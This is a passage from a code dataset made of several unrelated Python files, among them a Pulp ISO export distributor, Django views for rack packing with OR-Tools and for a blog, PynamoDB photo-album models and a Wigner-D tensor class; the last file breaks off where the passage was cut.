You should\n# have received a copy of GPLv2 along with this software; if not, see\n# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.\n\nfrom gettext import gettext as _\nimport os\nimport shutil\n\nfrom pulp.plugins.conduits.repo_publish import RepoPublishConduit\nfrom pulp.plugins.distributor import GroupDistributor\nfrom pulp.server.exceptions import PulpDataException\n\n# Import export_utils from this directory, which is not in the python path\nimport export_utils\nfrom pulp_rpm.common import constants, ids, models\nfrom pulp_rpm.yum_plugin import util\n\n_logger = util.getLogger(__name__)\n\n# Things left to do:\n# Cancelling a publish operation is not currently supported.\n# Published ISOs are left in the working directory. See export_utils.publish_isos to fix this.\n# This is not currently in the python path. When that gets fixed, the imports should be fixed.\n\n\nclass GroupISODistributor(GroupDistributor):\n\n def __init__(self):\n super(GroupISODistributor, self).__init__()\n self.cancelled = False\n self.summary = {}\n self.details = {}\n\n @classmethod\n def metadata(cls):\n \"\"\"\n Used by Pulp to classify the capabilities of this distributor. The\n following keys must be present in the returned dictionary:\n\n * id - Programmatic way to refer to this distributor. Must be unique\n across all distributors. Only letters and underscores are valid.\n * display_name - User-friendly identification of the distributor.\n * types - List of all content type IDs that may be published using this\n distributor.\n\n This method call may be made multiple times during the course of a\n running Pulp server and thus should not be used for initialization\n purposes.\n\n :return: description of the distributor's capabilities\n :rtype: dict\n \"\"\"\n return {\n 'id': ids.TYPE_ID_DISTRIBUTOR_GROUP_EXPORT,\n 'display_name': _('Group Export Distributor'),\n 'types': [models.RPM.TYPE, models.SRPM.TYPE, models.DRPM.TYPE, models.Errata.TYPE,\n models.Distribution.TYPE, models.PackageCategory.TYPE, models.PackageGroup.TYPE]\n }\n\n def validate_config(self, repo_group, config, config_conduit):\n \"\"\"\n Allows the distributor to check the contents of a potential configuration\n for the given repository. This call is made both for the addition of\n this distributor to a new repository group, as well as updating the configuration\n for this distributor on a previously configured repository.\n\n The return is a tuple of the result of the validation (True for success,\n False for failure) and a message. The message may be None and is unused\n in the success case. If the message is not None, i18n is taken into\n consideration when generating the message.\n\n The related_repo_groups parameter contains a list of other repository groups that\n have a configured distributor of this type. 
The distributor configurations\n is found in each repository group in the \"plugin_configs\" field.\n\n :param repo_group: metadata describing the repository to which the configuration applies\n :type repo_group: pulp.plugins.model.Repository\n :param config: plugin configuration instance\n :type config: pulp.plugins.config.PluginCallConfiguration\n :param config_conduit: Configuration Conduit;\n :type config_conduit: pulp.plugins.conduits.repo_validate.RepoConfigConduit\n\n :return: tuple of (bool, str) to describe the result\n :rtype: tuple\n \"\"\"\n return export_utils.validate_export_config(config)\n\n def publish_group(self, repo_group, publish_conduit, config):\n \"\"\"\n Publishes the given repository group.\n\n :param repo_group: metadata describing the repository group\n :type repo_group: pulp.plugins.model.RepositoryGroup\n :param publish_conduit: provides access to relevant Pulp functionality\n :type publish_conduit: pulp.plugins.conduits.repo_publish.RepoGroupPublishConduit\n :param config: plugin configuration\n :type config: pulp.plugins.config.PluginConfiguration\n :return: report describing the publish run\n :rtype: pulp.plugins.model.PublishReport\n \"\"\"\n # First, validate the configuration because there may be override config options, and currently,\n # validate_config is not called prior to publishing by the manager.\n valid_config, msg = export_utils.validate_export_config(config)\n if not valid_config:\n raise PulpDataException(msg)\n\n _logger.info('Beginning export of the following repository group: [%s]' % repo_group.id)\n\n # The progress report for a group publish\n progress_status = {\n constants.PROGRESS_REPOS_KEYWORD: {constants.PROGRESS_STATE_KEY: constants.STATE_NOT_STARTED},\n constants.PROGRESS_ISOS_KEYWORD: {constants.PROGRESS_STATE_KEY: constants.STATE_NOT_STARTED},\n constants.PROGRESS_PUBLISH_HTTP: {constants.PROGRESS_STATE_KEY: constants.STATE_NOT_STARTED},\n constants.PROGRESS_PUBLISH_HTTPS: {constants.PROGRESS_STATE_KEY: constants.STATE_NOT_STARTED}\n }\n\n def progress_callback(progress_keyword, status):\n \"\"\"\n Progress callback used to update the progress report for the publish conduit\n\n :param progress_keyword: The keyword to assign the status to in the progress report dict\n :type progress_keyword: str\n :param status: The status to assign to the keyword.\n :type status: dict\n \"\"\"\n progress_status[progress_keyword] = status\n publish_conduit.set_progress(progress_status)\n\n # Before starting, clean out the working directory. 
Done to remove last published ISOs\n shutil.rmtree(repo_group.working_dir, ignore_errors=True)\n os.makedirs(repo_group.working_dir)\n\n # Retrieve the configuration for each repository, the skip types, and the date filter\n packed_config = export_utils.retrieve_group_export_config(repo_group, config)\n rpm_repositories, self.date_filter = packed_config\n\n # Update the progress for the repositories section\n repos_progress = export_utils.init_progress_report(len(rpm_repositories))\n progress_callback(constants.PROGRESS_REPOS_KEYWORD, repos_progress)\n\n # For every repository, extract the requested types to the working directory\n for repo_id, working_dir in rpm_repositories:\n # Create a repo conduit, which makes sharing code with the export and yum distributors easier\n repo_conduit = RepoPublishConduit(repo_id, ids.EXPORT_GROUP_DISTRIBUTOR_ID)\n\n # If there is a date filter perform an incremental export, otherwise do everything\n if self.date_filter:\n result = export_utils.export_incremental_content(working_dir, repo_conduit,\n self.date_filter)\n else:\n result = export_utils.export_complete_repo(repo_id, working_dir, repo_conduit, config)\n self.summary[repo_id] = result[0]\n self.details[repo_id] = result[1]\n\n repos_progress[constants.PROGRESS_ITEMS_LEFT_KEY] -= 1\n repos_progress[constants.PROGRESS_NUM_SUCCESS_KEY] += 1\n progress_callback(constants.PROGRESS_REPOS_KEYWORD, repos_progress)\n\n repos_progress[constants.PROGRESS_STATE_KEY] = constants.STATE_COMPLETE\n progress_callback(constants.PROGRESS_REPOS_KEYWORD, repos_progress)\n\n # If there was no export directory, publish via ISOs\n if not config.get(constants.EXPORT_DIRECTORY_KEYWORD):\n self._publish_isos(repo_group, config, progress_callback)\n\n for repo_id, repo_dir in rpm_repositories:\n if repo_id in self.details and len(self.details[repo_id]['errors']) != 0:\n return publish_conduit.build_failure_report(self.summary, self.details)\n\n self.summary['repositories_exported'] = len(rpm_repositories)\n self.summary['repositories_skipped'] = len(repo_group.repo_ids) - len(rpm_repositories)\n\n return publish_conduit.build_success_report(self.summary, self.details)\n\n def _publish_isos(self, repo_group, config, progress_callback=None):\n \"\"\"\n This just decides what the http and https publishing directories should be, cleans them up,\n and then calls publish_isos method in export_utils\n\n :param repo_group: metadata describing the repository group. Used to retrieve the\n working directory and group id.\n :type repo_group: pulp.plugins.model.RepositoryGroup\n :param config: plugin configuration instance\n :type config: pulp.plugins.config.PluginCallConfiguration\n :param progress_callback: callback to report progress info to publish_conduit. 
This function is\n expected to take the following arguments: type_id, a string, and\n status, which is a dict\n :type progress_callback: function\n \"\"\"\n\n http_publish_dir = os.path.join(constants.GROUP_EXPORT_HTTP_DIR, repo_group.id).rstrip('/')\n https_publish_dir = os.path.join(constants.GROUP_EXPORT_HTTPS_DIR, repo_group.id).rstrip('/')\n image_prefix = config.get(constants.ISO_PREFIX_KEYWORD) or repo_group.id\n\n # Clean up the old export publish directories.\n shutil.rmtree(http_publish_dir, ignore_errors=True)\n shutil.rmtree(https_publish_dir, ignore_errors=True)\n\n # If publishing isn't enabled for http or https, set the path to None\n if not config.get(constants.PUBLISH_HTTP_KEYWORD):\n http_publish_dir = None\n if not config.get(constants.PUBLISH_HTTPS_KEYWORD):\n https_publish_dir = None\n\n export_utils.publish_isos(repo_group.working_dir, image_prefix, http_publish_dir,\n https_publish_dir, config.get(constants.ISO_SIZE_KEYWORD),\n progress_callback)\n","sub_path":"plugins/pulp_rpm/plugins/distributors/export_distributor/groupdistributor.py","file_name":"groupdistributor.py","file_ext":"py","file_size_in_byte":10894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"132717727","text":"import torch\nfrom numpy import pi\n\n# Hack to avoid circular imports\nfrom lgn.g_lib import g_tau, g_tensor\nfrom lgn.g_lib import rotations as rot\n\nGTau = g_tau.GTau\nGTensor = g_tensor.GTensor\n\n\nclass GWignerD(GTensor):\n \"\"\"\n Core class for creating and tracking WignerD matrices.\n\n At the core of each `GWignerD` is a list of `torch.Tensors` with\n shape `(2*l+1, 2*l+1, 2)`, where:\n\n * `2*l+1` is the size of an irrep of weight `l`.\n * `2` corresponds to the real/imaginary parts of the complex dimension.\n\n Note\n ----\n\n For now, there is no batch or channel dimensions included. 
Although a\n    G covariant network architecture with Wigner-D matrices is possible,\n    the current scheme using PyTorch built-ins would be too slow to implement.\n    A custom CUDA kernel would likely be necessary, and is a work in progress.\n\n    Warning\n    -------\n    The constructor __init__() does not check that the tensor is actually\n    a Wigner-D matrix (that is, an irreducible representation of the group G),\n    so it is important to ensure that the input tensor is generated appropriately.\n\n    Parameters\n    ----------\n\n    data : iterable of `torch.Tensor` with appropriate shape\n        Input of a G vector.\n    \"\"\"\n\n    @property\n    def zdim(self):\n        return 0\n\n    @property\n    def bdim(self):\n        return None\n\n    @property\n    def cdim(self):\n        return None\n\n    @property\n    def rdim1(self):\n        return 1\n\n    @property\n    def rdim2(self):\n        return 2\n\n    rdim = rdim2\n\n    @property\n    def keys(self):\n        return self.keys()\n\n    @staticmethod\n    def _get_shape(batch, key, channels):\n        return (2, (key[0] + 1) * (key[1] + 1), (key[0] + 1) * (key[1] + 1))\n\n    def check_data(self, data):\n        if any(part.numel() == 0 for part in data.values()):\n            raise NotImplementedError(\n                \"Empty parts in GWignerD not currently enabled!\"\n            )\n\n        shapes = {key: part.shape for key, part in data.items()}\n\n        zdims = {key: shape[self.zdim] for key, shape in shapes.items()}\n        rdims = {\n            key: (shape[self.rdim1], shape[self.rdim2]) for key, shape in shapes.items()\n        }\n\n        if not all(\n            rdims[key][0] == (key[0] + 1) * (key[1] + 1)\n            and rdims[key][1] == (key[0] + 1) * (key[1] + 1)\n            for key in data.keys()\n        ):\n            raise ValueError(\n                f\"Irrep dimension (dim={self.rdim}) of each tensor should have shape (k+1)*(n+1)! Found: {rdims}\"\n            )\n\n        if not all(zdim == 2 for zdim in zdims.values()):\n            raise ValueError(\n                f\"Complex dimension (dim={self.zdim}) of each tensor should have length 2! 
Found: {zdims}\"\n )\n\n @staticmethod\n def _bin_op_type_check(type1, type2):\n if type1 == GWignerD and type2 == GWignerD:\n raise ValueError(\"Cannot multiply two GWignerD!\")\n\n @staticmethod\n def euler(maxdim, angles=None, device=None, dtype=None, requires_grad=False):\n \"\"\"\n Factory method to create a new `GWeight`.\n\n If `angles=None`, will generate a uniformly distributed random Euler\n angle and then instantiate a GWignerD accordingly.\n \"\"\"\n\n if angles is None:\n alpha, beta, gamma = torch.rand(3) * 2 * pi + 1j * torch.rand(3) * 2 * pi\n beta = beta / 2\n\n wigner_d = {\n (k, n): rot.LorentzD((k, n), alpha, beta, gamma, device=device, dtype=dtype)\n for k in range(maxdim)\n for n in range(maxdim)\n }\n\n return GWignerD(wigner_d)\n\n @staticmethod\n def rand(maxdim, device=None, dtype=None, requires_grad=False):\n \"\"\"Overwrite factor method inherited from `GTensor` since\n it would break covariance\"\"\"\n raise NotImplementedError(\"Does not make sense as it would break covariance!\")\n\n @staticmethod\n def randn(maxdim, device=None, dtype=None, requires_grad=False):\n \"\"\"Overwrite factor method inherited from `GTensor` since\n it would break covariance\"\"\"\n raise NotImplementedError(\"Does not make sense as it would break covariance!\")\n\n @staticmethod\n def zeros(maxdim, device=None, dtype=None, requires_grad=False):\n \"\"\"Overwrite factor method inherited from `GTensor` since\n it would break covariance\"\"\"\n raise NotImplementedError(\"Does not make sense as it would break covariance!\")\n\n @staticmethod\n def ones(maxdim, device=None, dtype=None, requires_grad=False):\n \"\"\"Overwrite factor method inherited from `GTensor` since\n it would break covariance\"\"\"\n raise NotImplementedError(\"Does not make sense as it would break covariance!\")\n","sub_path":"lgn/g_lib/g_wigner_d.py","file_name":"g_wigner_d.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"279382802","text":"import re\nfrom .handler import Handler\n\nclass LogEventHandler(Handler):\n def __init__(self):\n super().__init__()\n\n def handles(self, event):\n return True\n\n def handle(self, g, event):\n company = event.actor.company\n if not company:\n company = \"unknown\"\n else:\n company = re.sub(r'\\W+', '', company).lower()\n\n self.logging.info('{} ({}): @{} -> {}'.format(event.repo.name, event.created_at, event.actor.login, event.type))\n self.monitoring_db.write('event', { 'value': 1 }, tags={ \n 'repo': event.repo.name,\n 'user': event.actor.login,\n 'company': company,\n 'type': event.type\n })\n if self.config.get('payload'):\n self.logging.info(' {}'.format(event.payload))\n\nLogEventHandler()\n","sub_path":"event/log_event_handler.py","file_name":"log_event_handler.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"24741863","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Create your views here.\nfrom ortools.linear_solver import pywraplp\nimport joblib\nimport pandas as pd\nimport numpy as np\nfrom .models import VaccantRacks\n\nfrom itertools import product\nvc=[{'category':'A','rackname':'A1-B1-C1','capacity':100},{'category':'B','rackname':'A1-B1-C2','capacity':100}] \n\ndef home1(request):\n\treturn render(request,'calc/home.html')\n\ndef home(request):\n\tdf={}\n\tif 
request.method==\"POST\":\n\t\tall_vaccantracknames=VaccantRacks.objects.all()\n\t\tfor i in all_vaccantracknames:\n\t\t\tprint(i.category)\n\t\t\n\t\t# a0=int(request.POST['digit-1'])\n\t\t# b0=int(request.POST['digit-2'])\n\t\t# c0=int(request.POST['digit-3'])\n\t\t# a1=int(request.POST['digit-4'])\n\t\t# b1=int(request.POST['digit-5'])\n\t\t# c1=int(request.POST['digit-6'])\n\t\tname=int(request.POST['name'])\n\t\tweights=request.POST['weights']\n\t\t\n\n\t\tmodel=pd.read_pickle('lr_model.pickle')\n\t\tweights=list(map(int,weights.split()))\n\t\tn=[]\n\t\tn.append(name)\n\n\t\tl1=list(product(n, weights))\n\t\tprint(l1)\n\t\tvalues =str(model.predict(l1))\n\t\tprint(\"es\",values[1:-1])\n\t\tvalues=values[1:-1]\n\t\tprint(values)\n\t\tvalues=list(map(float,values.split()))\n\t\tif name==0:\n\t\t\tname='Phone'\n\t\telif name==1:\n\t\t\tname='Chairs'\n\t\telse:\n\t\t\tname='Kurti'\n\n\t\tA=['Phone', 'Books', 'Printers', 'Electric tiffins']\n\t\tB=['Accessories', 'Chairs', 'Electronic Games', 'Hankerchief', 'Shoes', 'Trousers']\n\t\tC=['Furnishings', 'Kurti', 'Pillows', 'Shirt', 'Spoons', 'Tables', 'Waterbottles']\n\t\tpname=request.POST['name']\n\t\tif name in A:\n\t\t\tracks=[i.rackname for i in all_vaccantracknames if i.category=='A']\n\t\t\tprint('A rack',racks)\n\t\telif name in B:\n\t\t\tracks=[i.rackname for i in all_vaccantracknames if i.category=='B']\n\t\t\tprint('B rack',racks)\n\t\telse:\n\t\t\tracks=[i.rackname for i in all_vaccantracknames if i.category=='C']\n\t\t\tprint('C rack',racks)\n\t\n\t\t#values=list(map(int,values.split()))\n\t\t\n\t\tdata = {}\n\t\t#weights = [48, 30, 42, 36, 36, 42, 42, 36, 24, 30, 30, 36, 36,98,90,10]\n\t\t#values = [10, 30, 25, 50, 35, 15, 40, 30, 35, 45, 10, 30, 25,40,45,30]\n\t\tdata['weights'] = weights\n\t\tdata['values'] = values\n\t\tprint(data['weights'],data['values'])\n\t\tdata['items'] = list(range(len(weights)))\n\t\tdata['num_items'] = len(weights)\n\t\tnum_bins = len(racks)\n\t\tdata['bins'] = list(range(num_bins))\n\t\tdata['bin_capacities']=[int(i.capacity) for i in all_vaccantracknames if i.rackname in racks]\n\t\t\n\t\tnbin=[]\n\t\t\n\t\tnbin=racks#[str(i.rackname) for i in all_vaccantracknames]\n\t\t\n\t\tll=list(zip(data['bin_capacities'],nbin))\n\t\tprint(\"ll values\",ll)\n\t\tsolver = pywraplp.Solver.CreateSolver('SCIP')\n\t\t#print(\"nbin\",nbin)\n\t\tx = {}\n\t\tfor i in data['items']:\n\t\t\tfor j in data['bins']:\n\t\t\t\tx[(i, j)] = solver.IntVar(0, 1, 'x_%i_%i' % (i, j))\n\t\t#print(x)\n\n\t\tfor i in data['items']:\n\t\t\tsolver.Add(sum(x[i, j] for j in data['bins']) <= 1)\n\t\tfor j in data['bins']:\n\t\t\tsolver.Add(\n\t\t\t\tsum(x[(i, j)] * data['weights'][i]\n\t\t\t\t\tfor i in data['items']) <= data['bin_capacities'][j])\n\t\tobjective = solver.Objective()\n\t\tfor i in data['items']:\n\t\t\tfor j in data['bins']:\n\t\t\t\tobjective.SetCoefficient(x[(i, j)], data['values'][i])\n\t\tobjective.SetMaximization()\n\t\tstatus = solver.Solve()\n\t\tif status == pywraplp.Solver.OPTIMAL:\n\t\t\tdf={}\n\t\t\ttotal_weight = 0\n\t\t\tfor j in data['bins']:\n\t\t\t\tsubd={}\n\t\t\t\tbin_weight = 0\n\t\t\t\tbin_value = 0\n\t\t\t\tsubd['bin']=nbin[j]\n\t\t\t\t#print('Bin ', nbin[j], '\\n')\n\t\t\t\tt=[]\n\t\t\t\tfor i in data['items']:\n\t\t\t\t\t#print(x[i,j].solution_value(),\"xxxx\")\n\t\t\t\t\tif x[i, j].solution_value() > 0:\n\t\t\t\t\t\tt.append(i)\n\t\t\t\t\t\tprint('Item', i, '- weight:', data['weights'][i], ' value:',data['values'][i])\n\t\t\t\t\t\tbin_weight += data['weights'][i]\n\t\t\t\t\t\tbin_value += 
data['values'][i]\n\t\t\t\tsubd['items']=t\n\t\t\t\tsubd['packedwt']=bin_weight\n\t\t\t\tsubd['packedval']=bin_value\n\t\t\t\t#print('Packed bin weight:', bin_weight)\n\t\t\t\t#print('Packed bin value:', bin_value)\n\t\t\t\t#print()\n\t\t\t\ttotal_weight += bin_weight\n\t\t\t\tif(bin_weight!=0):\n\t\t\t\t\tdf[j+1]=subd\n\t\t\t#df[0]=[int(objective.Value()),total_weight]\n\t\t#content={'total_prof':int(objective.Value()),'total_weight':total_weight} \n\t\t# for i in df.values():\n\t\t# \tr=VaccantRacks.objects.get(rackname=i['bins'])\n\t\t# \tcap=r.capacity-bin_weight\n\t\t# \tVaccantRacks.objects.filter(rackname=i['bins']).update(capacity=cap)\n\t\tprint(df)\n\t\tprint(\"=========\")\n\t\t\n\t\tfor i in df.values():\n\t\t\tt = VaccantRacks.objects.get(rackname=i['bin'])\n\t\t\tprint(t.capacity,\"TTTT\",i['packedwt'])\n\t\t\tt.capacity =t.capacity-i['packedwt']\n\t\t\tt.save()\n\t\t\n\t\t\n\t\t # change field\n\t\t\t\n\n\n\n\ttext=\"This is my text\"\n\t# a=10\n\t# b=10\n\t# a=a+b\n\tcontent={\n\t 't':text,\n\t 'cal':10,\n\t}\n\n\treturn render(request,'calc/index.html',{'d0':df,'d1':content,'d2':['sas','asda','asfd']})\n\n\n\n\n\n\ndef index(request):\n\tif request.method==\"POST\":\n\t\tweight=request.POST['weights']\n\treturn HttpResponse(\"d\")\n\n\"\"\"def button(request):\n\treturn render(request,'calc/index.html')\ndef output(request):\n\tdata=requests.get(\"https://www.google.com/\")\n\tprint(data.text)\n\tdata=data.text\n\treturn render(request,'calc/index.html',{'data':data})\ndef external(request):\n\tinp= request.POST.get('param')\n\tout= run([sys.executable,'C://Te proj//entripot//calc//tp.py',inp,\"args1\",\"args2\"],shell=False,stdout=PIPE)\n\tprint(out)\n\treturn render(request,'calc/index.html',{'data1':out.stdout})\ndef button(request):\n\treturn render(request,'calc/index.html')\ndef output(request):\n\tdata=requests.get(\"https://www.google.com/\")\n\tprint(data.text)\n\tdata=data.text\n\treturn render(request,'calc/index.html',{'data':data})\"\"\"\n\n","sub_path":"calc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"616265022","text":"import webapp2\nimport base_page\nfrom google.appengine.ext import ndb\nfrom google.appengine.api import images\nfrom google.appengine.ext import blobstore\nimport db_defs\n\nclass Edit(base_page.BaseHandler):\n def __init__(self, request, response):\n self.initialize(request, response)\n self.template_values = {}\n self.template_values['edit_url'] = blobstore.create_upload_url('/edit/channel')\n\n def get(self):\n if self.request.get('type') == 'channel':\n channel_key = ndb.Key(urlsafe=self.request.get('key'))\n channel = channel_key.get()\n if channel.icon:\n self.template_values['img_url']= images.get_serving_url(channel.icon, crop=True, size=64)\n self.template_values['channel'] = channel\n classes = db_defs.ChannelClass.query(ancestor=ndb.Key(db_defs.ChannelClass, self.app.config.get('default-group')))\n class_boxes = []\n for c in classes:\n if c.key in channel.classes:\n class_boxes.append({'name':c.name,'key':c.key.urlsafe(),'checked':True})\n else:\n class_boxes.append({'name':c.name,'key':c.key.urlsafe(),'checked':False})\n self.template_values['classes'] = class_boxes\n self.render('edit.html', self.template_values)\n","sub_path":"dynamic/edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 
+{"seq_id":"220162030","text":"\"\"\"\n cloudalbum/database/model_ddb.py\n ~~~~~~~~~~~~~~~~~~~~~~~\n Application data model defined here.\n\n :description: CloudAlbum is a fully featured sample application for 'Moving to AWS serverless' training course\n :copyright: © 2019 written by Dayoungle Jun, Sungshik Jou.\n :license: MIT, see LICENSE for more details.\n\"\"\"\nfrom datetime import datetime\nfrom pynamodb.models import Model\nfrom pynamodb.attributes import UnicodeAttribute, NumberAttribute, UTCDateTimeAttribute\nfrom pynamodb.indexes import GlobalSecondaryIndex, IncludeProjection\nfrom tzlocal import get_localzone\nimport json\nimport boto3\n\n\nAWS_REGION = boto3.session.Session().region_name\n\n\nclass EmailIndex(GlobalSecondaryIndex):\n \"\"\"\n This class represents a global secondary index\n \"\"\"\n\n class Meta:\n index_name = 'user-email-index'\n read_capacity_units = 2\n write_capacity_units = 1\n projection = IncludeProjection(['password'])\n\n # This attribute is the hash key for the index\n # Note that this attribute must also exist\n # in the model\n email = UnicodeAttribute(hash_key=True)\n\n\nclass User(Model):\n \"\"\"\n User table for DynamoDB\n \"\"\"\n\n class Meta:\n table_name = 'User'\n region = AWS_REGION\n\n id = UnicodeAttribute(hash_key=True)\n email_index = EmailIndex()\n email = UnicodeAttribute(null=False)\n username = UnicodeAttribute(null=False)\n password = UnicodeAttribute(null=False)\n\n\nclass Photo(Model):\n \"\"\"\n Photo table for DynamoDB\n \"\"\"\n\n class Meta:\n table_name = 'Photo'\n region = AWS_REGION\n\n user_id = UnicodeAttribute(hash_key=True)\n id = UnicodeAttribute(range_key=True)\n tags = UnicodeAttribute(null=True)\n desc = UnicodeAttribute(null=True)\n filename_orig = UnicodeAttribute(null=True)\n filename = UnicodeAttribute(null=True)\n filesize = NumberAttribute(null=True)\n geotag_lat = UnicodeAttribute(null=True)\n geotag_lng = UnicodeAttribute(null=True)\n upload_date = UTCDateTimeAttribute(default=datetime.now(get_localzone()))\n taken_date = UTCDateTimeAttribute(null=True)\n make = UnicodeAttribute(null=True)\n model = UnicodeAttribute(null=True)\n width = UnicodeAttribute(null=True)\n height = UnicodeAttribute(null=True)\n city = UnicodeAttribute(null=True)\n nation = UnicodeAttribute(null=True)\n address = UnicodeAttribute(null=True)\n\n\nclass ModelEncoder(json.JSONEncoder):\n def default(self, obj):\n if hasattr(obj, 'attribute_values'):\n return obj.attribute_values\n elif isinstance(obj, datetime):\n return obj.isoformat()\n return json.JSONEncoder.default(self, obj)\n\n\ndef photo_deserialize(photo):\n photo_json = {}\n photo_json['id'] = photo.id\n photo_json['filename'] = photo.filename\n photo_json['filename_orig'] = photo.filename_orig\n photo_json['filesize'] = photo.filesize\n photo_json['upload_date'] = photo.upload_date\n photo_json['tags'] = photo.tags\n photo_json['desc'] = photo.desc\n photo_json['geotag_lat'] = photo.geotag_lat\n photo_json['geotag_lng'] = photo.geotag_lng\n photo_json['taken_date'] = photo.taken_date\n photo_json['make'] = photo.make\n photo_json['model'] = photo.model\n photo_json['width'] = photo.width\n photo_json['height'] = photo.height\n photo_json['city'] = photo.city\n photo_json['nation'] = photo.nation\n photo_json['address'] = photo.address\n return 
photo_json\n\n","sub_path":"LAB03/02-S3/backend/cloudalbum/database/model_ddb.py","file_name":"model_ddb.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"536155262","text":"# For easy inspection on what dependencies were used in test.\ndef pytest_report_header(config):\n import sys\n\n s = \"\\nFull Python Version: \\n{0}\\n\\n\".format(sys.version)\n\n try:\n import warnings\n from astropy.utils.introspection import resolve_name\n except ImportError:\n return s\n\n for module_name in ('requests', 'numpy', 'astropy'):\n try:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", DeprecationWarning)\n module = resolve_name(module_name)\n except ImportError:\n s += \"{0}: not available\\n\".format(module_name)\n else:\n try:\n version = module.__version__\n except AttributeError:\n version = 'unknown (no __version__ attribute)'\n s += \"{0}: {1}\\n\".format(module_name, version)\n\n return s\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"92666798","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ImageMetadata(Model):\n \"\"\"Image metadata.\n\n :param width: Image width\n :type width: int\n :param height: Image height\n :type height: int\n :param format: Image format\n :type format: str\n \"\"\"\n\n _attribute_map = {\n 'width': {'key': 'width', 'type': 'int'},\n 'height': {'key': 'height', 'type': 'int'},\n 'format': {'key': 'format', 'type': 'str'},\n }\n\n def __init__(self, width=None, height=None, format=None):\n super(ImageMetadata, self).__init__()\n self.width = width\n self.height = height\n self.format = format\n","sub_path":"azure-cognitiveservices-vision-computervision/azure/cognitiveservices/vision/computervision/models/image_metadata.py","file_name":"image_metadata.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"21696008","text":"'''\nThis is a program to print the missing letter that tend to form the pallindrome string\n'''\n\ns=input()\ns1=s[::-1]\nfor i in range(len(s)//2):\n print(s[i],s1[i])\n if(s1[i]!=s[i]):\n s2=s[i:len(s)-i]\n break\nif(s2[1:]==s2[:0:-1]):\n print(s2[0])\nelse:\n print(s2[-1])\n","sub_path":"missingpalindrome.py","file_name":"missingpalindrome.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"51841548","text":"from django.conf.urls import url\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . 
import views\n\n\nurlpatterns = [\n # navigation urls\n # ---------------\n\n url(r'^$', views.blog, name=\"index\"),\n # url(r'^home/$', views.home, name=\"home\"),\n url(r'^trash/$', views.trash, name=\"trash\"),\n url(r'^add/$', views.add, name=\"add\"),\n\n # blog categories\n # ---------------\n url(r'^(?P[\\w]+)$', views.category, name=\"category\"),\n\n # blog CRUD urls\n # --------------\n url(r'^(?P[0-9]+)/$', views.detail, name=\"detail\"),\n url(r'^(?P[0-9]+)/trash_detail/$', views.trash_detail, name=\"trash_detail\"),\n url(r'^(?P[0-9]+)/edit/$', views.edit, name=\"edit\"),\n url(r'^(?P[0-9]+)/delete/$', views.delete, name=\"delete\"),\n url(r'^(?P[0-9]+)/delete_trash/$', views.delete_trash, name=\"delete_trash\"),\n url(r'^(?P[0-9]+)/comment/$', views.comment, name=\"comment\"),\n url(r'^(?P[0-9]+)/like/$', views.like, name=\"like\"),\n url(r'^(?P[0-9]+)/share/$', views.share, name=\"share\"),\n\n # commenting system urls\n # ----------------------\n url(r'^edit_comment/(?P[0-9]+)/$', views.edit_comment, name=\"edit_comment\"),\n url(r'^del_comment/(?P[0-9]+)/$', views.del_comment, name=\"del_comment\"),\n\n # user management\n # -----------------\n url(r'^sign_up/$', views.sign_up, name=\"sign_up\"),\n url(r'^user_login/$', views.user_login, name=\"user_login\"),\n url(r'^user_logout/$', views.user_logout, name=\"user_logout\"),\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"566996202","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 8 15:15:26 2019\r\n\r\n@author: 赵利渊\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom pymysql import connect\r\nimport sqlalchemy as sql\r\nfrom util.xdebug import dd\r\nfrom sqlhelper import batch\r\nfrom time import strftime\r\nfrom datetime import datetime,timedelta\r\nfrom optparse import OptionParser\r\nfrom ipdb import set_trace\r\n\r\nclass load:\r\n \r\n def __init__(self, suid, euid):\r\n self.suid=suid\r\n self.euid=euid\r\n \r\n def data(self):\r\n suid = self.suid\r\n euid = self.euid\r\n\r\n # 连接到现在的数据库\r\n db = batch.connection('prophet')\r\n metadata = sql.MetaData(bind=db)\r\n t = sql.Table('prophet_cash_cycle', metadata, autoload=True)\r\n columns = [\r\n t.c.cc_uid,\r\n t.c.cc_age,\r\n t.c.cc_investable_asset,\r\n t.c.cc_expenditure_asset,\r\n t.c.created_at,\r\n ]\r\n s = sql.select(columns)\r\n baseDf = pd.read_sql(s,db)\r\n baseDf.sort_values(by = ['created_at'], ascending = False, inplace = True)\r\n 